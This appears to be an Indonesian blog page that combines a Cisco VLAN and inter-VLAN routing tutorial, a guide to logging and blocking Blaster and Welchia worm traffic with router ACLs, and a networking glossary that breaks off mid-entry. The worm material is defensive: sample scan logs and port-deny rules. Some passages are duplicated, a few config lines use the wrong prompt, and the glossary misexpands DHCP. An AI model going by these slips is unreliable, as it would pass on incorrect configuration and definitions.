Switch_Lt1(vlan)# vlan 20 name produksi
Switch_Lt1(vlan)# exit
Switch_Lt1# config terminal
Switch_Lt1(config)# interface fastethernet 0/12
Switch_Lt1(config-if)# switchport mode trunk
Switch_Lt1(config-if)# switchport trunk encapsulation dot1q
Switch_Lt1(config-if)# exit
Switch_Lt1(config)# interface fastethernet 0/1
Switch_Lt1(config-if)# switchport mode access
Switch_Lt1(config-if)# switchport access vlan 10 ==> 10 = VLAN yang kita assignkan di port fastethernet 0/1
Switch_Lt1(config)# interface fastethernet 0/2
Switch_Lt1(config-if)# switchport mode access
Switch_Lt1(config-if)# switchport access vlan 10
Switch_Lt1(config)# interface fastethernet 0/3
Switch_Lt1(config-if)# switchport mode access
Switch_Lt1(config-if)# switchport access vlan 20
Switch_Lt1(config)# interface fastethernet 0/4
Switch_Lt1(config-if)# switchport mode access
Switch_Lt1(config-if)# switchport access vlan 20
Switch_Lt1# copy running-config startup-config

Switch_Lt2:

Switch_Lt2# vlan database
Switch_Lt2(vlan)# vlan 10 name keuangan
Switch_Lt2(vlan)# vlan 20 name produksi
Switch_Lt2(vlan)# vlan 30 name penjualan
Switch_Lt2(vlan)# vlan 40 name HRD
Switch_Lt2# config terminal
Switch_Lt2(config)# interface fastethernet 0/12
Switch_Lt2(config-if)# switchport mode trunk
Switch_Lt2(config-if)# switchport trunk encapsulation dot1q
Switch_Lt2(config)# interface fastethernet 0/11
Switch_Lt2(config-if)# switchport mode trunk
Switch_Lt2(config-if)# switchport trunk encapsulation dot1q
Switch_Lt2(config)# interface fastethernet 0/10
Switch_Lt2(config-if)# switchport mode trunk
Switch_Lt2(config-if)# switchport trunk encapsulation dot1q
Switch_Lt2(config)# interface fastethernet 0/1
Switch_Lt2(config-if)# switchport mode access
Switch_Lt2(config-if)# switchport access vlan 10
Switch_Lt2(config)# interface fastethernet 0/2
Switch_Lt2(config-if)# switchport mode access
Switch_Lt2(config-if)# switchport access vlan 10
Switch_Lt2(config)# interface fastethernet 0/3
Switch_Lt2(config-if)# switchport mode access
Switch_Lt2(config-if)# switchport access vlan 20
Switch_Lt2(config)# interface fastethernet 0/4
Switch_Lt2(config-if)# switchport mode access
Switch_Lt2(config-if)# switchport access vlan 20
Switch_Lt2(config)# interface fastethernet 0/5
Switch_Lt2(config-if)# switchport mode access
Switch_Lt2(config-if)# switchport access vlan 30
Switch_Lt2(config)# interface fastethernet 0/6
Switch_Lt2(config-if)# switchport mode access
Switch_Lt2(config-if)# switchport access vlan 30
Switch_Lt2(config)# interface fastethernet 0/7
Switch_Lt2(config-if)# switchport mode access
Switch_Lt2(config-if)# switchport access vlan 40
Switch_Lt2(config)# interface fastethernet 0/8
Switch_Lt2(config-if)# switchport mode access
Switch_Lt2(config-if)# switchport access vlan 40
Switch_Lt1# copy running-config startup-config

Switch_Lt3:

Switch_Lt3# vlan database
Switch_Lt3(vlan)# vlan 30 name penjualan
Switch_Lt3(vlan)# vlan 50 name IT
Switch_Lt3(vlan)# exit
Switch_Lt3# configure terminal
Switch_Lt3(config)# interface fastethernet 0/11
Switch_Lt3(config-if)# switchport mode trunk
Switch_Lt3(config-if)# switchport trunk encapsulation dot1q
Switch_Lt3(config)# interface fastethernet 0/1
Switch_Lt3(config-if)# switchport mode access
Switch_Lt3(config-if)# switchport access vlan 30
Switch_Lt3(config)# interface fastethernet 0/2
Switch_Lt3(config-if )# switchport mode access
Switch_Lt3(config-if)# switchport access vlan 30
Switch_Lt3(config)# interface fastethernet 0/3
Switch_Lt3(config-if)# switchport mode access
Switch_Lt3(config-if)# switchport access vlan 50
Switch_Lt3(config)# interface fastethernet 0/4
Switch_Lt3(config-if)# switchport mode access
Switch_Lt3(config-if)# switchport access vlan 50
Switch_Lt3# copy running-config startup-config

verify pada switch :

Switch# show vlan ==> Lihat semua VLAN yg telah kita create
Switch# show vlan [number] ==> Lihat VLAN ID yang telah kita buat
Switch# show running-config ==> Melihat keseluruhan konfigurasi kita
coba ping dari PC client yg sama VLAN ID, Klo bisa berarti link antar switch dah bisa.

Penjelasan command pada switch :

Switch_Lt3(config)# interface fastethernet 0/2
Switch_Lt3(config-if)# switchport mode access
Switch_Lt3(config-if)# switchport access vlan [VLAN ID]

Maksud dari 3 perintah diatas adalah Meng-assignkan port fastethernet 0/2 menjadi milik [VLANID] dan membuat port tersebut mempunyai mode access. That’s means.. port tersebut hanya dapat membawa [VLAN ID]nya saja dan ini penting untuk di terapkan di setiap port yg menuju ke PC Client.

Switch_Lt3(config)# interface fastethernet 0/11
Switch_Lt3(config-if)# switchport mode trunk
Switch_Lt3(config-if)# switchport trunk encapsulation dot1q

Maksud dari 3 perintah diatas adalah Meng-assignkan port fastethernet 0/11 mempunyai encapsulation dot1q dan menjadikan port tersebut menjadi trunk. Trunk means.. pada link port tersebut dia yg bekerja membawa multiple [VLAN ID] dalam satu link. Oleh karena itu Kita bisa berkomunikasi antar VLAN.. dikarenakan ada port yang dijadikan trunk.

-=-=-= Router =-=-=-
Pada Router yang harus kita lakukan adalah sbb:
1. Buat Sub-interface sebanyak VLAN yg telah kita create
2. Set Gateway di setiap Sub-Interface
3. Set Encapsulation sesuai dengan encapsulation yg dipakai di switch

Rtr_VLAN :

Rtr_VLAN# configure terminal
Rtr_VLAN(config)# interface fastethernet 0/0
Rtr_VLAN(config-if)# no shutdown ==> Menghidupkan interface fa0/0
Rtr_VLAN(config)# interface fastethernet 0/0.10
Rtr_VLAN(config-subif)# encapsulation dot1q 10
Rtr_VLAN(config-subif)# ip address 192.168.1.1 255.255.255.0
Rtr_VLAN(config)# interface fastethernet 0/0.20
Rtr_VLAN(config-subif)# encapsulation dot1q 20
Rtr_VLAN(config-subif)# ip address 192.168.2.1 255.255.255.0
Rtr_VLAN(config)# interface fastethernet 0/0.30
Rtr_VLAN(config-subif)# encapsulation dot1q 30
Rtr_VLAN(config-subif)# ip address 192.168.3.1 255.255.255.0
Rtr_VLAN(config)# interface fastethernet 0/0.40
Rtr_VLAN(config-subif)# encapsulation dot1q 40
Rtr_VLAN(config)# ip address 192.168.4.1 255.255.255.0
Rtr_VLAN(config)# interface fastethernet 0/0.50
Rtr_VLAN(config-subif)# encapsulation dot1q 50
Rtr_VLAN(config-subif)# ip address 192.168.5.1 255.255.255.0
Rtr_VLAN# copy running-config startup-config

verify pada router:

Rtr_VLAN# show ip route ==> Terlihat semua network2 yang kita buat
Rtr_VLAN# show running-config ==> Melihat keseluruhan konfigurasi kita
Coba ping dari PC client yg berbeda VLAN ID, Klo bisa berarti link + trunk dah berjalan dengan baik. Dan VLAN telah berhasil kita implementasi dengan baik.. D

Penjelasan command pada router :

Rtr_VLAN(config)# interface fastethernet 0/0.10
Rtr_VLAN(config-subif)# encapsulation dot1q 10
Rtr_VLAN(config)# ip address 192.168.1.1 255.255.255.0

Pada 3 baris perintah diatas kita membuat sub-interface dimana “fastethernet 0/0″ ini adalah parent dari interface yg kita pakai dan “fastethernet 0/0.10″ ini adalah child dari dari “fastethernet 0/0″. pada “.10″ ini sebenarnya terserah kita ingin menggunakan berapa saja, asalkan berupa digit. Saya menggunakan “10″ karena pada sub-interface yang saya pasang adalah khusus untuk VLAN ID 10, sehingga utk kedepannya bila terjadi error atau maintenance akan mempermudah kita dalam men-solve the problem. Lalu saya memetakan pada VLAN ID 10 itu adalah Networknya 192.168.1.0/24 atau Network 192.168.1.0 Netmasknya 255.255.255.0 dan Gateway 192.168.1.1. Inget!!! Gateway harus diletakkan di Router, karena Routerlah yg bekerja di Layer 3 dari OSI Layer. Klo Switch manageable lebih banyak bekerja di Layer 2 dari OSI Layer.

Hhhmmm… Akhirnya selesai juga yah implementasi VLAN.. Hihihi…Very Happy. Jangan seneng dulu cuy..!! Ini baru implementasi VLAN dg Static ada lagi implementasi VLAN dengan dynamic. Klo static percis seperti yang saya jelaskan diatas.. jadi setiap port sudah di-assignkan masing2 untuk VLAN tertentu, klo mo merubahnya harus konfigurasi ulang settingan yg telah kita buat sebelumnya. Klo dynamic. enaknya kita tidak perlu konfigurasi ulang.. jadi sudah kita setting sebelumnya dg menambahkan konfigurasi menggunakan port security. InsyaALLAH di lain waktu bila ada waktu luang, akan saya jelaskan lagi ttg VLAN secara dynamic. Akhirkata.. Alhamdulillah.. selesai juga, Huhhh.. Klo dari teman2 ada yg bingung, silahkan lgsg tanya aja yah, Klo saya bisa jawab.. akan lgsg saya jawab. Klo ada kesalahan2 dari penulisan saya diatas.. lgsg dikritik ajah.. OK?!?!

Keuntungan menggunakan VLAN :

* Easily move workstations on the LAN
* Easily add workstations to the LAN
* Easily change the LAN configuration
* Easily control network traffic
* Improve security

blok virus dari cisco router

Router merupakan sebuah device yang berfungsi untuk meneruskan paket-paket dari sebuah network ke network yang lainnya (baik LAN ke LAN atau LAN ke WAN) sehingga host-host yang ada pada sebuah network bisa berkomunikasi dengan host-host yang ada pada network yang lain. Router menghubungkan network-network tersebut pada network layer dari model OSI, sehingga secara teknis Router adalah Layer 3 Gateway. Selain itu juga router dapat menangkap dan melihat aktivitas trafik dalam jaringan, sehingga memudahkan kita untuk mengklasifikasikan trafik dan membuang paket-paket yang tidak diperlukan. Berkembangnya virus-virus komputer yang sangat cepat, cukup merugikan para penyedia jaringan dan pengguna komputer. Serangan virus ini telah banyak mengkonsumsi bandwidth sehingga trafik aplikasi yang sebenarnya tidak bisa dilewatkan melalui jaringan karena jaringan telah dipenuhi oleh paket-paket virus.

Berikut ini tulisan yang menyajikan cara memonitor trafik dan memblok paket virus dengan menggunakan router Cisco.

Untuk menampung semua trafik yang keluar masuk, harus dibuatkan tempat yang biasanya disebut log.

Pada router cisco, buffer log tidak aktfi secara default. Oleh karena itu kita harus mengaktifkannya sebelum menampung trafik yang akan kita lihat.

Cara mengaktifkan log buffer pada Router Cisco:

Router(config)# logging buffered 4096
Router(config)# exit

Angka 4096 mempunyai satuan bytes, jadi tempat/memori yang disediakan untuk menangkat trafik sebesar 4096 Bytes.

Setelah itu, kita membuat profile untuk menangkap trafik dengan menggunakan Access Control List (ACL) extended.

Contoh :

Konfigurasi access-list 101

Router# config t
Router(config)# access-list 101 permit icmp any any log
Router(config)# access-list 101 permit tcp any any gt 0 log
Router(config)# access-list 101 permit udp any any gt 0 log
Router(config)# access-list 101 permit ip any any log

Pengertian permit berarti semua paket (icmp, tcp, udp, ip) diijinkan lewat

Selanjutnya terapkan Access-List yang sudah dibuat pada interface yang akan kita tangkap trafiknya.

Misal kita ingin menangkap trafik yang masuk ke port Fast Ethernet 0 : (dapat diterapkan di semua interface, seperti : E0, S0, S1.1, S2/0.1, ATM0/0.1, dll)

Router(config)# int fa0
Router(config-if)# ip access-group 101 in
Router(config-if)# exit

Agar hasil log dapat terlihat Tanggal dan Jam-nya, maka harus dikonfigurasi sebagai berikut:

Router(config)# service timestamps log datetime localtime
Router(config)# exit
Router#clock set 14:00:00 17 May 2004

Setelah selesai, kita dapat melihat semua trafik yang masuk ke Fast Ethernet 0:

Perintah yang digunakan adalah : show log

Router#show log

May 17 14:02:38: %SEC-6-IPACCESSLOGP: list 101 permitted tcp 172.21.0.182(1019) -> 192.168.134.82(515), 2 packets

May 17 14:02:44: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 192.168.134.2 -> 192.168.134.42 (3/13), 6 packets

May 17 14:02:44: %SEC-6-IPACCESSLOGP: list 101 permitted tcp 172.21.0.182(1019) -> 192.168.134.43(515), 1 packet

May 17 14:03:03: %SEC-6-IPACCESSLOGP: list 101 permitted tcp 172.21.0.155(1014) -> 192.168.134.67(515), 2 packets

May 17 14:03:05: %SEC-6-IPACCESSLOGP: list 101 permitted tcp 172.21.0.182(1005) -> 192.168.134.67(515), 2 packets

Dari data trafik baris pertama di atas, paket tcp port 1019 dengan IP 172.21.0.182 masuk ke port Fast Ethernet 0 dengan tujuan IP 192.168.134.82 menggunakan port 515 sebanyak 2 paket, terjadi pada tanggal 17 May 2004 jam 14:02:38.

Dari data trafik baris pertama di atas, paket tcp port 1019 dengan IP 172.21.0.182 masuk ke port Fast Ethernet 0 dengan tujuan IP 192.168.134.82 menggunakan port 515 sebanyak 2 paket, terjadi pada tanggal 17 May 2004 jam 14:02:38.Dari data trafik baris pertama di atas, paket tcp port 1019 dengan IP 172.21.0.182 masuk ke port Fast Ethernet 0 dengan tujuan IP 192.168.134.82 menggunakan port 515 sebanyak 2 paket, terjadi pada tanggal 17 May 2004 jam 14:02:38.Untuk melihat throughput atau utilisasi pada interface Fast Ethernet 0, dapat menggunakan perintah:

Router# sho int fa0

….
5 minute input rate 11264000 bits/sec, 2378 packets/sec
5 minute output rate 5203000 bits/sec, 3060 packets/sec
……

Virus Jaringan

PC yang terkena virus akan selalu mengirimkan paket-paket ke jaringan dalam jumlah besar dalam waktu singkat.

Jika pada saat kita menangkap trafik pada suatu interface, terdapat pola paket yang sangat banyak dan menggunakan port TCP, UDP atau ICMP yang sama, kemungkinan jaringan ini terkena virus.

Berikut contoh-contoh paket virus dalam jaringan :

Salah satu jenis Virus Blaster menggunakan TCP port 135, virus ini dapat memenuhi jaringan dan menyebabkan aplikasi di jaringan menjadi lambat atau bahkan hang. Paket ini akan terus memenuhi jaringan walaupun kondisi komputer sedang tidak melakukan aktivitas.

May 19 14:25:48: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.69(2865) -> 129.74.248.15(135), 1 packet

May 19 14:25:49: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.66(4283) -> 10.239.97.117(135), 1 packet

May 19 14:25:50: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.69(2897) -> 129.74.248.47(135), 1 packet

May 19 14:25:51: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.70(3832) -> 166.58.195.45(135), 1 packet

May 19 14:25:52: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.68(2189) -> 68.44.91.87(135), 1 packet

May 19 14:25:53: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.70(3864) -> 166.58.195.77(135), 1 packet

May 19 14:25:54: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.66(4335) -> 10.239.97.167(135), 1 packet

May 19 14:25:55: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.69(2947) -> 129.74.248.97(135), 1 packet

May 19 14:25:56: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.66(4369) -> 10.239.97.199(135), 1 packet

May 19 14:25:57: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.68(2239) -> 68.44.91.137(135), 1 packet

May 19 14:25:58: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.70(3914) -> 166.58.195.127(135), 1 packet

Jenis Virus Blaster yang lain menggunakan TCP port 445, 139 dan UDP port 137 (ada juga yang menggunakan port 138, tetapi tidak ditampilkan di sini)

May 25 15:46:46: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2774) -> 64.120.84.40(445), 1 packet

May 25 15:46:47: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2776) -> 64.120.84.41(445), 1 packet

May 25 15:46:48: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2778) -> 64.120.84.42(445), 1 packet

May 25 15:46:49: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2780) -> 64.120.84.43(445), 1 packet

May 25 15:46:50: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2782) -> 64.120.84.44(445), 1 packet

May 25 15:46:51: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2784) -> 64.120.84.45(445), 1 packet

May 25 15:46:52: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2787) -> 64.120.84.46(139), 1 packet

May 25 15:46:53: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2789) -> 64.120.84.47(139), 1 packet

May 25 15:46:54: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2790) -> 64.120.84.48(445), 1 packet

May 25 15:46:55: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2792) -> 64.120.84.49(445), 1 packet

May 25 15:46:56: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2794) -> 64.120.84.50(445), 1 packet

May 25 15:48:06: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2922) -> 64.120.84.111(139), 1 packet

May 25 15:48:07: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2924) -> 64.120.84.112(139), 1 packet

May 25 15:48:08: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2940) -> 64.120.84.119(139), 1 packet

May 25 15:48:10: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2944) -> 64.120.84.121(139), 1 packet

May 25 15:48:11: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2952) -> 64.120.84.125(445), 1 packet

May 25 15:48:12: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2955) -> 64.120.84.126(139), 1 packet

May 25 15:48:13: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2956) -> 64.120.84.127(445), 1 packet

May 25 15:48:14: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2959) -> 64.120.84.128(139), 1 packet

May 25 15:48:15: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2962) -> 64.120.84.129(139), 1 packet

May 25 15:48:16: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2964) -> 64.120.84.130(139), 1 packet

May 25 15:48:17: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2966) -> 64.120.84.131(139), 1 packet

May 25 15:48:18: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2968) -> 64.120.84.132(139), 1 packet

May 25 15:48:19: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2970) -> 64.120.84.133(139), 1 packet

May 25 15:48:21: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2974) -> 64.120.84.135(139), 1 packet

May 25 15:48:22: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2976) -> 64.120.84.136(139), 1 packet

May 25 15:48:23: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2978) -> 64.120.84.137(139), 1 packet

May 25 15:48:24: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2981) -> 64.120.84.138(139), 1 packet

May 25 15:48:25: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2984) -> 64.120.84.139(139), 1 packet

May 25 15:48:26: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2985) -> 64.120.84.140(445), 1 packet

May 25 15:48:27: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2979) -> 64.120.84.138(445), 1 packet

May 25 15:48:28: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2984) -> 64.120.84.139(139), 1 packet

May 25 15:48:29: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2992) -> 64.120.84.143(139), 1 packet

May 25 15:48:30: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2974) -> 64.120.84.135(139), 1 packet

May 25 15:48:32: %SEC-6-IPACCESSLOGP: list 107 permitted tcp 202.152.18.230(2978) -> 64.120.84.137(139), 1 packet

May 18 16:20:48: %SEC-6-IPACCESSLOGP: list 104 permited udp 10.49.100.230(1028) -> 19.135.133.55(137), 1 packet

May 18 16:20:49: %SEC-6-IPACCESSLOGP: list 104 permited tcp 10.49.12.124(4616) -> 10.14.44.151(445), 1 packet

May 18 16:20:50: %SEC-6-IPACCESSLOGP: list 104 permited tcp 10.49.148.98(2979) -> 10.49.181.197(445), 1 packet

May 18 16:20:51: %SEC-6-IPACCESSLOGP: list 104 permited tcp 10.49.20.116(4176) -> 10.49.239.149(445), 1 packet

May 18 16:20:52: %SEC-6-IPACCESSLOGP: list 104 permited udp 10.49.18.195(1030) -> 139.64.66.76(137), 1 packet

May 18 16:20:53: %SEC-6-IPACCESSLOGP: list 104 permited udp 10.49.12.34(1027) -> 120.134.165.57(137), 1 packet

May 18 16:20:54: %SEC-6-IPACCESSLOGP: list 104 permited udp 10.49.6.35(1031) -> 3.151.81.106(137), 1 packet

May 18 16:20:55: %SEC-6-IPACCESSLOGP: list 104 permited tcp 10.49.20.115(3517) -> 10.49.217.164(445), 1 packet

May 18 16:20:56: %SEC-6-IPACCESSLOGP: list 104 permited tcp 10.49.2.131(1903) -> 10.174.107.77(445), 1 packet

May 18 16:20:57: %SEC-6-IPACCESSLOGP: list 104 permited tcp 10.49.22.68(4704) -> 10.57.51.106(445), 1 packet

May 18 16:20:58: %SEC-6-IPACCESSLOGP: list 104 permited udp 10.49.5.99(1027) -> 132.70.123.242(137), 1 packet

May 19 14:25:48: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.69(2865) -> 129.74.248.15(135), 1 packet

May 19 14:25:49: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.66(4283) -> 10.239.97.117(135), 1 packet

May 19 14:25:50: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.69(2897) -> 129.74.248.47(135), 1 packet

May 19 14:25:51: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.70(3832) -> 166.58.195.45(135), 1 packet

May 19 14:25:52: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.68(2189) -> 68.44.91.87(135), 1 packet

May 19 14:25:53: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.70(3864) -> 166.58.195.77(135), 1 packet

May 19 14:25:54: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.66(4335) -> 10.239.97.167(135), 1 packet

May 19 14:25:55: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.69(2947) -> 129.74.248.97(135), 1 packet

May 19 14:25:56: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.66(4369) -> 10.239.97.199(135), 1 packet

May 19 14:25:57: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.68(2239) -> 68.44.91.137(135), 1 packet

May 19 14:25:58: %SEC-6-IPACCESSLOGP: list 102 permitted tcp 10.236.48.70(3914) -> 166.58.195.127(135), 1 packet

Paket Virus Welchia/Nachi:

Oct 22 10:59:50: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 202.152.13.98 -> 192.170.211.87 (8/0), 1 packet

Oct 22 10:59:51: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 202.152.13.98 -> 192.170.211.248 (8/0), 1 packet

Oct 22 10:59:52: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 202.152.13.98 -> 192.170.212.186 (8/0), 1 packet

Oct 22 10:59:53: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 202.152.13.98 -> 192.170.213.46 (8/0), 1 packet

Dengan menggunakan Router kita dapat memblok paket-paket tersebut diatas agar tidak menulari jaringan yang lain atau memenuhi jaringan WAN.

Bloking paket virus dilakukan di sisi router pada interface yang paling dekat dengan keberadaan jaringan yang bervirus.

Contoh cara melakukan Bloking Paket pada virus Blaster yang menggunakan TCP port 445 dan UDP port 137 adalah dengan menggunakan Access Control List (ACL) sebagai berikut :

Router# config t
Router(config)# access-list 104 deny tcp any any eq 445 log
Router(config)# access-list 104 deny udp any any eq 137 log
Router(config)# access-list 104 permit ip any any

Catatan : Jangan lupa di akhir command untuk selalu memasang permit ip any any , setelah anda melakukan bloking dengan perintah deny. Jika anda tidak memasang permit ip any any, maka semua paket akan diblok.

Selanjutnya kita pasang access-list 104 di atas, pada interface tempat masuknya virus, misal di interface ethernet0:

Router(config)# int e0
Router(config-if)#ip access-group 104 in
Router(config-if)# exit

Untuk melihat hasilnya adalah sebagai berikut :

Router# sho log

May 18 16:21:08: %SEC-6-IPACCESSLOGP: list 104 denied udp 169.254.166.50(137) -> 169.254.255.255(137), 1 packet

May 18 16:21:09: %SEC-6-IPACCESSLOGP: list 104 denied tcp 10.49.151.68(1339) -> 10.49.35.78(445), 1 packet

May 18 16:21:10: %SEC-6-IPACCESSLOGP: list 104 denied udp 10.49.100.230(1028) -> 4.71.4.82(137), 1 packet

May 18 16:21:11: %SEC-6-IPACCESSLOGP: list 104 denied udp 10.49.19.130(1027) -> 46.33.60.237(137), 1 packet

May 18 16:21:12: %SEC-6-IPACCESSLOGP: list 104 denied udp 10.49.7.194(1028) -> 140.120.202.83(137), 1 packet

May 18 16:21:13: %SEC-6-IPACCESSLOGP: list 104 denied tcp 10.49.15.132(3882) -> 10.74.93.59(445), 1 packet

May 18 16:21:14: %SEC-6-IPACCESSLOGP: list 104 denied tcp 10.49.20.115(3562) -> 185.142.133.192(445), 1 packet

May 18 16:21:15: %SEC-6-IPACCESSLOGP: list 104 denied tcp 10.49.12.124(3058) -> 10.228.79.203(445), 1 packet

May 18 16:21:16: %SEC-6-IPACCESSLOGP: list 104 denied tcp 10.49.12.40(3571) -> 31.7.189.248(445), 1 packet

May 18 16:21:17: %SEC-6-IPACCESSLOGP: list 104 denied udp 10.49.13.130(1026) -> 14.0.106.191(137), 1 packet

May 18 16:21:18: %SEC-6-IPACCESSLOGP: list 104 denied udp 10.49.15.99(1029) -> 62.178.109.147(137), 1 packet

May 18 16:21:19: %SEC-6-IPACCESSLOGP: list 104 denied udp 10.49.8.105(1027) -> 144.203.127.85(137), 1 packet

May 18 16:21:20: %SEC-6-IPACCESSLOGP: list 104 denied udp 10.49.8.6(1027) -> 119.123.155.124(137), 1 packet

May 18 16:21:21: %SEC-6-IPACCESSLOGP: list 104 denied tcp 10.49.20.116(4314) -> 17.101.32.39(445), 1 packet

Terlihat bahwa semua paket yang menggunakan TCP port 445 dan UDP port 137 akan di Deny (blok).Terlihat bahwa semua paket yang menggunakan TCP port 445 dan UDP port 137 akan di Deny (blok). Hal ini sangat bermanfaat jika jaringan kita menggunakan WAN.

Terlihat bahwa semua paket yang menggunakan TCP port 445 dan UDP port 137 akan di Deny (blok).Hal ini sangat bermanfaat jika jaringan kita menggunakan WAN.Misal kita menggunakan WAN Frame Relay dengan kecepatan 64 Kbps. Jika suatu LAN 100 Mbps di remote terkena virus seperti diatas, maka semua paket virus ini akan menyebar dan masuk ke WAN yang mempunyai kecepatan hanya 64 Kbps. Dapat dibayangkan pasti jaringan WAN yang 64 kbps ini akan penuh, dan user-user di remote tidak akan bisa melakukan hubungan ke jaringan pusat.

Dengan dilakukan bloking seperti cara di atas, maka jaringan WAN 64 Kbps ini akan bersih dan tetap terjaga pemakaian bandwidthnya.

Selamat mencoba!!!

kamus jaringan

ADSL - Asymetric Digital Subscriber Line. Sebuah tipe DSL dimana upstream dan downstream
berjalan pada kecepatan yang berbeda. Dalam hal ini, downstream biasanya lebih tinggi.. Secara
teori, ASDL dapat melayani kecepatan hingga 9 mbps untuk downstream dan 540 kbps untuk
upstream.

Anonymous FTP - Situs FTP yang dapat diakses tanpa harus memiliki login tertentu. Aturan
standar dalam mengakses Anonymous FTP adalah dengan mengisikan "Anonymous" pada isian
Username dan alamat email sebagai password

ARPANet - Advanced Research Projects Agency Network. Jaringan yang menjadi cikal-bakal
terbentuknya Internet. Dibangun pada akhir dasawarsa 60-an hingga awal dasawarsa 70-an oleh
Departemen Pertahanan Amerika Serikat sebagai percobaan untuk membentuk sebuah jaringan
berskala besar (WAN)

Bandwidth - Besaran yang menunjukkan seberapa banyak data yang dapat dilewatkan dalam
koneksi melalui sebuah network

Bridge - adalah peranti yang meneruskan lalu lintas antara segmen jaringan berdasar informasi
pada lapisan data link. Segmen ini mempunyai alamat lapisan jaringan yang sama. Setiap jaringan
seharusnya hanya mempunyai sebuah bridge utama

Coaxial – Jenis kabel yang terdiri dari sebuah kabel tembaha yang dikelilingi oleh siolasi dan
pelindung lubang kabel yang dihubungkan dengan tanah

DHCP - Dynamic Host Control Protocol memungkinkan satu komputer atau peralatan
jaringan lainnya(seperti router) memberikan serangkaian alamat IP pribadi kita ke PC
yang lain


Dial-up Connection - Suatu jenis koneksi Internet yang memakai saluran telepon untuk
menentukan koneksi. Koneksi ini populer tapi sangat lambat. Komputer menentukan koneksi
internet dengan telepon sebagai modemnya

DNS - Domain Name Service. Merupakan layanan di Internet untuk jaringan yang menggunakan
TCP/IP. Layanan ini digunakan untuk mengidentifikasi sebuah komputer dengan
nama
bukan
dengan menggunakan alamat IP (IP address). Singkatnya DNS melakukan konversi dari nama ke
angka. DNS dilakukan secara desentralisasi, dimana setiap daerah atau tingkat organisasi memiliki
domain sendiri. Masing-masing memberikan servis DNS untuk domain yang dikelola.

DSS – Digital Satelleite System. Jenis dial-up connection yang memakai piting satelit untuk men-
download informsi dari internet. Koneksi ini cepat tapi hanya satu arah, maka harus menentukan
dial up connection lewat saluran telepon untuk memulai internet

DSL - Digital Subscriber Line. Sebuah metode transfer data melalui saluran telepon reguler. Sirkuit
DSL dikonfigurasikan untuk menghubungkan dua lokasi yang spesifik, seperti halnya pada
sambungan Leased Line (DSL berbeda dengan Leased Line). Koneksi melalui DSL jauh lebih cepat
dibandingkan dengan koneksi melalui saluran telepon reguler walaupun keduanya sama-sama
menggunakan kabel tembaga. DSL menawarkan alternatif yang lebih murah dibandingkan dengan
ISDN

Download - Istilah untuk kegiatan menyalin data (biasanya berupa file) dari sebuah komputer yang
